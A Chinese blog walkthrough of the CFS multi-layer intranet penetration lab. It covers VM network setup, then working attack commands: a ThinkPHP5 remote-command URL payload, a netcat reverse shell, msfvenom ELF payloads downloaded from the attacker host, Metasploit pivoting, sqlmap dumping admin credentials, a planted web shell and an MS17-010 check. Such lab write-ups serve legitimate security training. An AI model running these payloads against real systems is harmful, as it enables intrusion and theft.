天道酬勤

CFS靶机—多层内网渗透靶机

 

CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10

靶机搭建

靶机搭建是我最头疼的地方,下面写一下配置的关键点。

在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器

其中最为头疼的呢就是桥接网络的设置。为什么说头疼呢,因为之前桥接网络,我就没有成功过。不过,这次可算真正弄清楚了。使用桥接网络最关键的一点就是一定要使用一个可以上网的正常网卡(如果不自己选择的话,vm会自动选择,很有可能就导致无法上网)。

那如何查看到底使用哪块网卡呢?接下来以图片展示:

由上图可以看出,我本机上网使用的是WLAN,于是在桥接模式中,我们就选择红框内标记的网卡即可。

贴个链接把,解决vm桥接模式无法正常使用

如果桥接模式始终不好使,但是你又真的是按照规定步骤来设置的,那么就重启电脑。重启电脑之后,一般就好了。

另外,还需要配置两个仅主机模式的网卡,那个就很简单了。手动给好IP地址,关闭DHCP即可。

在此建议,为了减少错误的发生,我们可以将vm的网络设置进行还原,以一个初始化的状态进行配置会好很多。还有一点需要注意的就是taget2机器ip的分配,登录靶机之后,首先使用命令ifconfig,查看相关的网卡,然后再对其进行分配IP,例如:ifconfig ens33 192.168.22.22 netmask 255.255.255.0

忘了说taget1,有时候分配的IP并不和CFS靶机那篇文章里的一样,但是并不影响我们使用。我们只需要在宝塔面板里对网站的域名重新解析即可。

主机扫描

target1

使用Nmap对其进行扫描

root@kali:~# nmap -sS -A 192.168.101.91 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 11:20 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.101.91
Host is up (0.00045s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|_    	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
80/tcp   open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
888/tcp  open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql   MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8888/tcp open  http    Ajenti http control panel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:1F:D6:B9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.101.91

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 564.90 seconds

我们得知目标开放了21、22、80、111、3306等端口。

22端口,爆出了用户名枚举漏洞,我们可以利用其进行爆破。

但是,按照常理,我们先访问一下80端口。

ThinkPHP5这玩意儿是个好东西,有很多漏洞。不急,我们先看下刚才nmap扫出的robots.txt

发现一枚flag:

ThinkPHP5远程命令执行

直接利用:

http://192.168.101.91/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

执行成功。

反弹shell

既然可以执行命令,那么我们就进行反弹shell。

先在kali上执行,nc -lvp 7777

而后,我们利用远程命令执行漏洞,执行nc 192.168.101.90 7777 -e /bin/bash

命令执行之后,我们拿到了shell,并使用python -c 'import pty;pty.spawn("/bin/bash")'获取交互shell。

在网站的根目录下发现了flag

在服务器的/home目录下,又发现了一枚flag。

至此,target1中的flag已经查找完毕。接下来,对target进行渗透。

target2

经过测试目标机器,可以使用wget,那就好说了,利用msf生成elf马。

生成elf

使用命令uname -a查看内核

[www@localhost public]$ uname -a
uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

所以,我们生成的木马也要是x86的。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=8888 -f elf >shell.elf

target1目标机器上线

使用python2开启web服务,python -m SimpleHTTPServer 8080

我们在目标机器上使用wget http://192.168.101.90:8080/shell.elf,下载elf文件。

并执行chmod +x shell.elf,赋予其执行权限。

接下来,在我们的kali中设置监听:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.90
lhost => 192.168.101.90
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.101.90   yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

开启监听,并在目标机器上执行elf文件:

成功上线。

路由转发

在msf中使用命令:run get_local_subnets,获取当前的网段。

192.168.101.0是我们刚才利用的网段,现在我们需要访问另一个网段的机器。需要添加路由。

利用命令run autoroute -s 192.168.22.0/24,添加路由。

并使用run autoroute -p,打印路由信息。

发现target2

本来想直接使用后渗透模块中的arp_scanner进行arp发现扫描,但是linux的elf,并不支持此脚本。

那我们就换一种方法。

使用portscan模块:

msf5 auxiliary(scanner/portscan/tcp) > set ports 22,3389
ports => 22,3389
msf5 auxiliary(scanner/portscan/tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        22,3389          yes       Ports to scan (e.g. 22-25,80,110-900)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.22.0/24  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      100              yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

为了简便,我就扫描了22端口和3389端口。

从扫描的结果中看出,192.168.22.22是一台linux机器,也就是我们正要找的target2。

由于这是一台处于内网中的机器,我们想要对其进行访问,有两种方式:

1、端口转发。(效率不高)

2、使用代理。

为了更好的进行渗透,我采用socks4a代理。

msf5 auxiliary(scanner/portscan/tcp) > search socks4a

Matching Modules
================

   #  Name                      Disclosure Date  Rank    Check  Description
   -  ----                      ---------------  ----    -----  -----------
   0  auxiliary/server/socks4a                   normal  No     Socks4a Proxy Server


msf5 auxiliary(scanner/portscan/tcp) > use 0
msf5 auxiliary(server/socks4a) > show options 

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  


msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.

[*] Starting the socks4a proxy server

socks4a的代理默认开在本地的端口,这样我们就可以访问到msf里的所有路由。

设置proxychain代理

在kali中编辑,vim /etc/proxychains.conf

这样我们就可以使用代理对其进行扫描了。

proxychains nmap -Pn -sT 192.168.22.22,对目标进行扫描。

解释一下,这里为什么用 ‘-Pn -sT’,因为socks4a不支持icmp协议,所以要使用不进行ping命令的-Pn,’-sT’则代表进行Tcp扫描。

得到扫描结果:

接着,使用此代理访问该IP的80端口,查看web服务。

是八哥cms,习惯性的查看了robots.txt

凭借robots.txt中的信息,找到了后台地址。

突破点是在主页的源码上,提示有注入。

拿出sqlmap:

python sqlmap.py -u http://192.168.22.22/index.php?r=vul&keyword=1 -p keyword --dbs

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump

登陆后台

拿到密码登录后台,发现flag。

找到模板修改处,添加一句话。

然后设置proxifier

使用菜刀连接http://192.168.22.22/index.php?r=tag ,密码为pass。

拿shell

在网站的/upload下发现flag

上线msf

使用命令uname -a,查看Linux版本

这次我们就要使用bind_tcp了。

bind_tcp:攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1111 -f elf > shell1.elf
----------------------------------------------------------------------------
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.22.22
rhost => 192.168.22.22
msf5 exploit(multi/handler) > set lport 1111
lport => 1111

我们在目标机器运行生成的shell1.elf之后即可上线。

上线之后就还是老样子,发现路由,添加路由。

target3

msf5 exploit(multi/handler) > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  Yes    WordPress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  Yes    NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  Yes    TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  Yes    FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  Yes    TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  Yes    TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  Yes    TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


msf5 exploit(multi/handler) > use 5

msf5 auxiliary(scanner/portscan/tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        22,3389          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.22.0/24  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      100              yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.33.0/24
rhosts => 192.168.33.0/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,445,3389
ports => 22,445,3389
msf5 auxiliary(scanner/portscan/tcp) > exploit 

[+] 192.168.33.33:        - 192.168.33.33:445 - TCP OPEN
[+] 192.168.33.33:        - 192.168.33.33:3389 - TCP OPEN
[+] 192.168.33.22:        - 192.168.33.22:22 - TCP OPEN
[*] 192.168.33.0/24:      - Scanned  49 of 256 hosts (19% complete)
[*] 192.168.33.0/24:      - Scanned  59 of 256 hosts (23% complete)
[*] 192.168.33.0/24:      - Scanned  99 of 256 hosts (38% complete)
[*] 192.168.33.0/24:      - Scanned 114 of 256 hosts (44% complete)
[*] 192.168.33.0/24:      - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.33.0/24:      - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.33.0/24:      - Scanned 201 of 256 hosts (78% complete)
[*] 192.168.33.0/24:      - Scanned 208 of 256 hosts (81% complete)
[*] 192.168.33.0/24:      - Scanned 255 of 256 hosts (99% complete)
[*] 192.168.33.0/24:      - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

发现目标机器192.168.33.33,开放了445和3389端口。

那就永恒之蓝走一波

永恒之蓝

先检测一下是否存在漏洞

msf5 auxiliary(scanner/portscan/tcp) > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/portscan/tcp) > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.33.33:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到漏洞存在,那就利用!

最后,网络出了点小问题,就没再去整,看了一下题解,最后是可以利用成功的。

 

 

赞(1) 打赏
未经允许不得转载:HackerGu‘s Blog » CFS靶机—多层内网渗透靶机
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏